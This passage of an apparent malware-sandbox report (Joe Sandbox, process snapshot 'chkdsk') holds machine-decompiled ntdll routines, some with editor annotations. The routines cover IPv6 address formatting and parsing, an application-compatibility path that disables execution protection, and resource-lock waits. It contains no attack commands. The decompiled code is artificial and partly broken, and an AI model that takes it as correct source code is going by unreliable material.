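    for (; i + 1 < cap && src[i]; i++) dst[i] = (uint16_t)(unsigned char)src[i];
    dst[i] = 0;
}

/* Constructed sample input: a UTC-like zone. */
tz_dynamic_info sample_tz(void)
{
    tz_dynamic_info tz;
    memset(&tz, 0, sizeof tz);
    set_name16(tz.StandardName, 32, "UTC");
    set_name16(tz.DaylightName, 32, "UTC");
    set_name16(tz.TimeZoneKeyName, 128, "UTC");
    return tz;
}

int main(void)
{
    tz_dynamic_info tz = sample_tz();
    write_log wl = {0};
    int32_t st = set_time_zone_information(&tz, sizeof tz, record_write, &wl);
    for (int i = 0; i < wl.count; i++) printf("%s (%u bytes)\n", wl.names[i], wl.lens[i]);
    printf("status 0x%08x, layout matches decompile: %d\n", (unsigned)st, layout_matches_decompile());
    return 0;
}
```

Compile with any C99 compiler; main() prints the nine value names with their byte lengths in write order. The `layout_matches_decompile` check is the quickest way to confirm the structure identification when the same offsets turn up in another dump.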

                                          C-Code - Quality: 38%
                                          			// Editor's reading of this routine: it renders the 16-byte IPv6 address at _a4 into the
                                          			// wide-char buffer at _a8, whose end is _a8 + 0x5c (46 characters, enough for
                                          			// "ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255" and a terminator). E023C7707 is a
                                          			// swprintf-style formatter taking (buffer, remaining chars, format, ...). The format
                                          			// strings "::ffff:0:%u.%u.%u.%u", "::%hs%u.%u.%u.%u", "%x", "::" and ":%u.%u.%u.%u"
                                          			// cover the IPv4-translated, IPv4-compatible/-mapped, plain hextet, zero-run and ISATAP
                                          			// forms. Word comparisons are on raw little-endian 16-bit loads, so 0xfe5e below is the
                                          			// byte pair 5e fe, i.e. 0x5efe in network order, and the mask 0xfffd accepts the words
                                          			// 0 and 0x0200 (the two ISATAP interface-identifier prefixes). This is the behaviour
                                          			// of RtlIpv6AddressToStringW in ntdll.
                                          			E023D13CB(intOrPtr* _a4, intOrPtr _a8) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				intOrPtr _t71;
                                          				signed int _t78;
                                          				signed int _t86;
                                          				char _t90;
                                          				signed int _t91;
                                          				signed int _t96;
                                          				intOrPtr _t108;
                                          				signed int _t114;
                                          				void* _t115;
                                          				intOrPtr _t128;
                                          				intOrPtr* _t129;
                                          				void* _t130;
                                          				intOrPtr _t116; // zero constant used throughout; the decompiler left it undeclared
                                          				_t129 = _a4;
                                          				_t128 = _a8;
                                          				_t116 = 0;
                                          				_t71 = _t128 + 0x5c;
                                          				_v8 = 8;
                                          				_v20 = _t71;
                                          				if( *_t129 == 0) {
                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                          						goto L5;
                                          					} else {
                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                          						if(_t96 != 0) {
                                          							L38:
                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                          								goto L5;
                                          							} else {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t86 = E023C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                          								L36:
                                          								return _t128 + _t86 * 2;
                                          							}
                                          						}
                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                          						if(_t114 == 0) {
                                          							L33:
                                          							_t115 = 0x2392926; // unresolved pointer to the %hs prefix; inferred from the word-5 == 0 test: the empty prefix of the IPv4-compatible form "::a.b.c.d"
                                          							L35:
                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                          							_t86 = E023C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                          							goto L36;
                                          						}
                                          						if(_t114 != 0xffff) {
                                          							_t116 = 0;
                                          							goto L38;
                                          						}
                                          						if(_t114 != 0) {
                                          							_t115 = 0x2399cac; // unresolved pointer to the %hs prefix; inferred from the word-5 == 0xffff test: "ffff:" for the IPv4-mapped form "::ffff:a.b.c.d"
                                          							goto L35;
                                          						}
                                          						goto L33;
                                          					}
                                          				} else {
                                          					L5:
                                          					_a8 = _t116;
                                          					_a4 = _t116;
                                          					_v12 = _t116;
                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                          						if( *(_t129 + 0xa) == 0xfe5e) { // ISATAP identifier (0:5efe or 200:5efe): print six hextets, then the last 32 bits dotted
                                          							_v8 = 6;
                                          						}
                                          					}
                                          					_t90 = _v8;
                                          					if(_t90 <= _t116) {
                                          						L11:
                                          						if(_a8 - _a4 <= 1) {
                                          							_a8 = _t116;
                                          							_a4 = _t116;
                                          						}
                                          						_t91 = 0;
                                          						if(_v8 <= _t116) {
                                          							L22:
                                          							if(_v8 < 8) {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t128 = _t128 + E023C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                          							}
                                          							return _t128;
                                          						} else {
                                          							L14:
                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                          								if(_t91 != _t116 && _t91 != _a8) {
                                          									_push(":");
                                          									_push(_t71 - _t128 >> 1);
                                          									_push(_t128);
                                          									_t128 = _t128 + E023C7707() * 2;
                                          									_t71 = _v20;
                                          									_t130 = _t130 + 0xc;
                                          								}
                                          								_t78 = E023C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                          								_t130 = _t130 + 0x10;
                                          							} else {
                                          								_push(L"::");
                                          								_push(_t71 - _t128 >> 1);
                                          								_push(_t128);
                                          								_t78 = E023C7707();
                                          								_t130 = _t130 + 0xc;
                                          								_t91 = _a8 - 1;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t128 = _t128 + _t78 * 2;
                                          							_t71 = _v20;
                                          							if(_t91 >= _v8) {
                                          								goto L22;
                                          							}
                                          							_t116 = 0;
                                          							goto L14;
                                          						}
                                          					} else {
                                          						_t108 = 1;
                                          						_v16 = _t129;
                                          						_v24 = _t90;
                                          						do {
                                          							if( *_v16 == _t116) {
                                          								if(_t108 - _v12 > _a8 - _a4) {
                                          									_a4 = _v12;
                                          									_a8 = _t108;
                                          								}
                                          								_t116 = 0;
                                          							} else {
                                          								_v12 = _t108;
                                          							}
                                          							_v16 = _v16 + 2;
                                          							_t108 = _t108 + 1;
                                          							_t26 =  &_v24;
                                          							 *_t26 = _v24 - 1;
                                          						} while ( *_t26 != 0);
                                          						goto L11;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
• Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 89435fddfa545b7862a9d3adc0564e9d5f7af5f0b66704f7e3829b98bf929920
                                          • Instruction ID: c2b0a28e7b65d2240265ed281e116424fb07b4ef4c7d3c1211102ee333cd488d
                                          • Opcode Fuzzy Hash: 89435fddfa545b7862a9d3adc0564e9d5f7af5f0b66704f7e3829b98bf929920
                                          • Instruction Fuzzy Hash: C36127B2E00655ABDF34DFA9D8809BFBBBAEF85300754C12EE9DA47541D334A640CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E023C7EFD(void* __ecx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				char _v540;
                                          				unsigned int _v544;
                                          				signed int _v548;
                                          				intOrPtr _v552;
                                          				char _v556;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t33;
                                          				void* _t38;
                                          				unsigned int _t46;
                                          				unsigned int _t47;
                                          				unsigned int _t52;
                                          				intOrPtr _t56;
                                          				unsigned int _t62;
                                          				void* _t69;
                                          				void* _t70;
                                          				intOrPtr _t72;
                                          				signed int _t73;
                                          				void* _t74;
                                          				void* _t75;
                                          				void* _t76;
                                          				void* _t77;
                                          
                                          				_t33 =  *0x2472088; // 0x76ee1647
                                          				_v8 = _t33 ^ _t73;
                                          				_v548 = _v548 & 0x00000000;
                                          				_t72 = _a4;
                                          				if(E023C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                          					__eflags = _v548;
                                          					if(_v548 == 0) {
                                          						goto L1;
                                          					}
                                          					_t62 = _t72 + 0x24;
                                          					E023E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                          					_t71 = 0x214;
                                          					_v544 = 0x214;
                                          					E0239DFC0( &_v540, 0, 0x214);
                                          					_t75 = _t74 + 0x20;
                                          					_t46 =  *0x2474218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                          					__eflags = _t46;
                                          					if(_t46 == 0) {
                                          						goto L1;
                                          					}
                                          					_t47 = _v544;
                                          					__eflags = _t47;
                                          					if(_t47 == 0) {
                                          						goto L1;
                                          					}
                                          					__eflags = _t47 - 0x214;
                                          					if(_t47 >= 0x214) {
                                          						goto L1;
                                          					}
                                          					_push(_t62);
                                          					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                          					E023E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                          					_t52 = E023A0D27( &_v540, L"Execute=1");
                                          					_t76 = _t75 + 0x1c;
                                          					_push(_t62);
                                          					__eflags = _t52;
                                          					if(_t52 == 0) {
                                          						E023E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                          						_t71 =  &_v540;
                                          						_t56 = _t73 + _v544 - 0x218;
                                          						_t77 = _t76 + 0x14;
                                          						_v552 = _t56;
                                          						__eflags = _t71 - _t56;
                                          						if(_t71 >= _t56) {
                                          							goto L1;
                                          						} else {
                                          							goto L10;
                                          						}
                                          						while(1) {
                                          							L10:
                                          							_t62 = E023A8375(_t71, 0x20);
                                          							_pop(_t69);
                                          							__eflags = _t62;
                                          							if(__eflags != 0) {
                                          								__eflags = 0;
                                          								 *_t62 = 0;
                                          							}
                                          							E023E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                          							_t77 = _t77 + 0x10;
                                          							E0240E8DB(_t69, _t70, __eflags, _t72, _t71);
                                          							__eflags = _t62;
                                          							if(_t62 == 0) {
                                          								goto L1;
                                          							}
                                          							_t31 = _t62 + 2; // 0x2
                                          							_t71 = _t31;
                                          							__eflags = _t71 - _v552;
                                          							if(_t71 >= _v552) {
                                          								goto L1;
                                          							}
                                          						}
                                          					}
                                          					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                          					_push(3);
                                          					_push(0x55);
                                          					E023E3F92();
                                          					_t38 = 1;
                                          					L2:
                                          					return E0239E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                          				}
                                          				L1:
                                          				_t38 = 0;
                                          				goto L2;
                                          			}

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 023E3F12
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 023E3F4A
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 023EE2FB
                                          • ExecuteOptions, xrefs: 023E3F04
                                          • Execute=1, xrefs: 023E3F5E
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 023E3EC4
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 023E3F75
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 023EE345
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
• Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: BaseDataModuleQuery
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 3901378454-484625025
                                          • Opcode ID: fccc9b55a97f6f55f0e02afb84a0c32fed81ddd5aaebd427d0e12a52ebb64a41
                                          • Instruction ID: ed16691e0b9c24cb53d4e1790f3e6f74a71fc370293d2b728b313adaa8f7c7a7
                                          • Opcode Fuzzy Hash: fccc9b55a97f6f55f0e02afb84a0c32fed81ddd5aaebd427d0e12a52ebb64a41
                                          • Instruction Fuzzy Hash: 7941CA7268071C7AEF30DAA4DCC5FEBB3BDAB15704F1004A9E906E6181E770DA498F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E023D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				void* _t108;
                                          				void* _t116;
                                          				char _t120;
                                          				short _t121;
                                          				void* _t128;
                                          				intOrPtr* _t130;
                                          				char _t132;
                                          				short _t133;
                                          				intOrPtr _t141;
                                          				signed int _t156;
                                          				signed int _t174;
                                          				intOrPtr _t177;
                                          				intOrPtr* _t179;
                                          				intOrPtr _t180;
                                          				void* _t183;
                                          
                                          				_t179 = _a4;
                                          				_t141 =  *_t179;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v12 = 0;
                                          				_v32 = 0;
                                          				_v20 = 0;
                                          				if(_t141 == 0) {
                                          					L41:
                                          					 *_a8 = _t179;
                                          					_t180 = _v24;
                                          					if(_t180 != 0) {
                                          						if(_t180 != 3) {
                                          							goto L6;
                                          						}
                                          						_v8 = _v8 + 1;
                                          					}
                                          					_t174 = _v32;
                                          					if(_t174 == 0) {
                                          						if(_v8 == 7) {
                                          							goto L43;
                                          						}
                                          						goto L6;
                                          					}
                                          					L43:
                                          					if(_v16 != 1) {
                                          						if(_v16 != 2) {
                                          							goto L6;
                                          						}
                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                          						L47:
                                          						if(_t174 != 0) {
                                          							E023A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                          							_t116 = 8;
                                          							E0239DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                          						}
                                          						return 0;
                                          					}
                                          					if(_t180 != 0) {
                                          						if(_v12 > 3) {
                                          							goto L6;
                                          						}
                                          						_t120 = E023D0CFA(_v28, 0, 0xa);
                                          						_t183 = _t183 + 0xc;
                                          						if(_t120 > 0xff) {
                                          							goto L6;
                                          						}
                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                          						goto L47;
                                          					}
                                          					if(_v12 > 4) {
                                          						goto L6;
                                          					}
                                          					_t121 = E023D0CFA(_v28, _t180, 0x10);
                                          					_t183 = _t183 + 0xc;
                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                          					goto L47;
                                          				} else {
                                          					while(1) {
                                          						_t123 = _v16;
                                          						if(_t123 == 0) {
                                          							goto L7;
                                          						}
                                          						_t108 = _t123 - 1;
                                          						if(_t108 != 0) {
                                          							goto L1;
                                          						}
                                          						_t178 = _t141;
                                          						if(E023D06BA(_t108, _t141) == 0 || _t135 == 0) {
                                          							if(E023D06BA(_t135, _t178) == 0 || E023D0A5B(_t136, _t178) == 0) {
                                          								if(_t141 != 0x3a) {
                                          									if(_t141 == 0x2e) {
                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                          											goto L41;
                                          										} else {
                                          											_v24 = _v24 + 1;
                                          											L27:
                                          											_v16 = _v16 & 0x00000000;
                                          											L28:
                                          											if(_v28 == 0) {
                                          												goto L20;
                                          											}
                                          											_t177 = _v24;
                                          											if(_t177 != 0) {
                                          												if(_v12 > 3) {
                                          													L6:
                                          													return 0xc000000d;
                                          												}
                                          												_t132 = E023D0CFA(_v28, 0, 0xa);
                                          												_t183 = _t183 + 0xc;
                                          												if(_t132 > 0xff) {
                                          													goto L6;
                                          												}
                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                          												goto L20;
                                          											}
                                          											if(_v12 > 4) {
                                          												goto L6;
                                          											}
                                          											_t133 = E023D0CFA(_v28, 0, 0x10);
                                          											_t183 = _t183 + 0xc;
                                          											_v20 = _v20 + 1;
                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                          											goto L20;
                                          										}
                                          									}
                                          									goto L41;
                                          								}
                                          								if(_v24 > 0 || _v8 > 6) {
                                          									goto L41;
                                          								} else {
                                          									_t130 = _t179 + 1;
                                          									if( *_t130 == _t141) {
                                          										if(_v32 != 0) {
                                          											goto L41;
                                          										}
                                          										_v32 = _v8 + 1;
                                          										_t156 = 2;
                                          										_v8 = _v8 + _t156;
                                          										L34:
                                          										_t179 = _t130;
                                          										_v16 = _t156;
                                          										goto L28;
                                          									}
                                          									_v8 = _v8 + 1;
                                          									goto L27;
                                          								}
                                          							} else {
                                          								_v12 = _v12 + 1;
                                          								if(_v24 > 0) {
                                          									goto L41;
                                          								}
                                          								_a7 = 1;
                                          								goto L20;
                                          							}
                                          						} else {
                                          							_v12 = _v12 + 1;
                                          							L20:
                                          							_t179 = _t179 + 1;
                                          							_t141 =  *_t179;
                                          							if(_t141 == 0) {
                                          								goto L41;
                                          							}
                                          							continue;
                                          						}
                                          						L7:
                                          						if(_t141 == 0x3a) {
                                          							if(_v24 > 0 || _v8 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t130 = _t179 + 1;
                                          								if( *_t130 != _t141) {
                                          									goto L41;
                                          								}
                                          								_v20 = _v20 + 1;
                                          								_t156 = 2;
                                          								_v32 = 1;
                                          								_v8 = _t156;
                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                          								goto L34;
                                          							}
                                          						}
                                          						L8:
                                          						if(_v8 > 7) {
                                          							goto L41;
                                          						}
                                          						_t142 = _t141;
                                          						if(E023D06BA(_t123, _t141) == 0 || _t124 == 0) {
                                          							if(E023D06BA(_t124, _t142) == 0 || E023D0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t128 = 1;
                                          								_a7 = 1;
                                          								_v28 = _t179;
                                          								_v16 = 1;
                                          								_v12 = 1;
                                          								L39:
                                          								if(_v16 == _t128) {
                                          									goto L20;
                                          								}
                                          								goto L28;
                                          							}
                                          						} else {
                                          							_a7 = 0;
                                          							_v28 = _t179;
                                          							_v16 = 1;
                                          							_v12 = 1;
                                          							goto L20;
                                          						}
                                          					}
                                          				}
                                          				L1:
                                          				_t123 = _t108 == 1;
                                          				if(_t108 == 1) {
                                          					goto L8;
                                          				}
                                          				_t128 = 1;
                                          				goto L39;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID: .$:$:
                                          • API String ID: 3965848254-2308638275
                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction ID: 7a8c7b2c0f8e18a955f5a67dc519c31553e04fcd02afac1e1ee18c5d5b29cf20
                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                          • Instruction Fuzzy Hash: 51A1AF72D0420ADFCF28CF64E8457FEB7B9EF45B08F24886AD852AB251D7309649CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E023D0554(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int* _t49;
                                          				signed int _t51;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				void* _t69;
                                          				signed int _t70;
                                          				void* _t75;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				void* _t86;
                                          				signed int _t93;
                                          				signed int _t96;
                                          				intOrPtr _t105;
                                          				signed int _t107;
                                          				void* _t110;
                                          				signed int _t115;
                                          				signed int* _t119;
                                          				void* _t125;
                                          				void* _t126;
                                          				signed int _t128;
                                          				signed int _t130;
                                          				signed int _t138;
                                          				signed int _t144;
                                          				void* _t158;
                                          				void* _t159;
                                          				void* _t160;
                                          
                                          				_t96 = _a4;
                                          				_t115 =  *(_t96 + 0x28);
                                          				_push(_t138);
                                          				if(_t115 < 0) {
                                          					_t105 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                          						goto L6;
                                          					} else {
                                          						__eflags = _t115 | 0xffffffff;
                                          						asm("lock xadd [eax], edx");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L6:
                                          					_push(_t128);
                                          					while(1) {
                                          						L7:
                                          						__eflags = _t115;
                                          						if(_t115 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          							_t49 = _t96 + 0x1c;
                                          							_t106 = 1;
                                          							asm("lock xadd [edx], ecx");
                                          							_t115 =  *(_t96 + 0x28);
                                          							__eflags = _t115;
                                          							if(_t115 < 0) {
                                          								L23:
                                          								_t130 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024701c0;
                                          									_push(_t144);
                                          									_push(0);
                                          									_t51 = E0238F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                          									__eflags = _t51 - 0x102;
                                          									if(_t51 != 0x102) {
                                          										break;
                                          									}
                                          									_t106 =  *(_t144 + 4);
                                          									_t126 =  *_t144;
                                          									_t86 = E023D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                          									_push(_t126);
                                          									_push(_t86);
                                          									E023E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                          									E023E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          									_t130 = _t130 + 1;
                                          									_t160 = _t158 + 0x28;
                                          									__eflags = _t130 - 2;
                                          									if(__eflags > 0) {
                                          										E0241217A(_t106, __eflags, _t96);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									E023E3F92();
                                          									_t158 = _t160 + 0xc;
                                          								}
                                          								__eflags = _t51;
                                          								if(__eflags < 0) {
                                          									_push(_t51);
                                          									E023D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                          									asm("int3");
                                          									while(1) {
                                          										L32:
                                          										__eflags = _a8;
                                          										if(_a8 == 0) {
                                          											break;
                                          										}
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                          										_t119 = _t96 + 0x24;
                                          										_t107 = 1;
                                          										asm("lock xadd [eax], ecx");
                                          										_t56 =  *(_t96 + 0x28);
                                          										_a4 = _t56;
                                          										__eflags = _t56;
                                          										if(_t56 != 0) {
                                          											L40:
                                          											_t128 = 0;
                                          											__eflags = 0;
                                          											while(1) {
                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                          												asm("sbb esi, esi");
                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024701c0;
                                          												_push(_t138);
                                          												_push(0);
                                          												_t58 = E0238F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                          												__eflags = _t58 - 0x102;
                                          												if(_t58 != 0x102) {
                                          													break;
                                          												}
                                          												_t107 =  *(_t138 + 4);
                                          												_t125 =  *_t138;
                                          												_t75 = E023D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                          												_push(_t125);
                                          												_push(_t75);
                                          												E023E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                          												E023E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                          												_t128 = _t128 + 1;
                                          												_t159 = _t158 + 0x28;
                                          												__eflags = _t128 - 2;
                                          												if(__eflags > 0) {
                                          													E0241217A(_t107, __eflags, _t96);
                                          												}
                                          												_push("RTL: Re-Waiting\n");
                                          												_push(0);
                                          												_push(0x65);
                                          												E023E3F92();
                                          												_t158 = _t159 + 0xc;
                                          											}
                                          											__eflags = _t58;
                                          											if(__eflags < 0) {
                                          												_push(_t58);
                                          												E023D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                          												asm("int3");
                                          												_t61 =  *_t107;
                                          												 *_t107 = 0;
                                          												__eflags = _t61;
                                          												if(_t61 == 0) {
                                          													L1:
                                          													_t63 = E023B5384(_t138 + 0x24);
                                          													if(_t63 != 0) {
                                          														goto L52;
                                          													} else {
                                          														goto L2;
                                          													}
                                          												} else {
                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                          													_push( &_a4);
                                          													_push(_t61);
                                          													_t70 = E0238F970( *((intOrPtr*)(_t138 + 0x18)));
                                          													__eflags = _t70;
                                          													if(__eflags >= 0) {
                                          														goto L1;
                                          													} else {
                                          														_push(_t70);
                                          														E023D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                          														L52:
                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                          														_push( &_a4);
                                          														_push(1);
                                          														_t63 = E0238F970( *((intOrPtr*)(_t138 + 0x20)));
                                          														__eflags = _t63;
                                          														if(__eflags >= 0) {
                                          															L2:
                                          															return _t63;
                                          														} else {
                                          															_push(_t63);
